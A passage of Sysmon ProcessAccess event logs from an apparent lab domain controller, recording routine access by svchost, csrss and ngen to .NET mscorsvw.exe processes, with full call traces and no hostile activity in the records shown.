C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.793","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-00105AAA0E00}","TargetProcessId":"4012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7065,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.840\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-001058AE0E00}\r\nTargetProcessId: 2960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.840","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-001058AE0E00}","TargetProcessId":"2960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7066,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.840\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-001058AE0E00}\r\nTargetProcessId: 2960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.840","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-001058AE0E00}","TargetProcessId":"2960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7067,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.855\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-001058AE0E00}\r\nTargetProcessId: 2960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.855","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-001058AE0E00}","TargetProcessId":"2960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7068,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.074\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-00100D4B0E00}\r\nTargetProcessId: 4636\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.074","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-00100D4B0E00}","TargetProcessId":"4636","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7069,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.074\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-00100D4B0E00}\r\nTargetProcessId: 4636\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.074","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-00100D4B0E00}","TargetProcessId":"4636","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7070,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.074\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-00100D4B0E00}\r\nTargetProcessId: 4636\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.074","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-00100D4B0E00}","TargetProcessId":"4636","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7071,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.136\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-001057D30C00}\r\nTargetProcessId: 4604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.136","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-001057D30C00}","TargetProcessId":"4604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0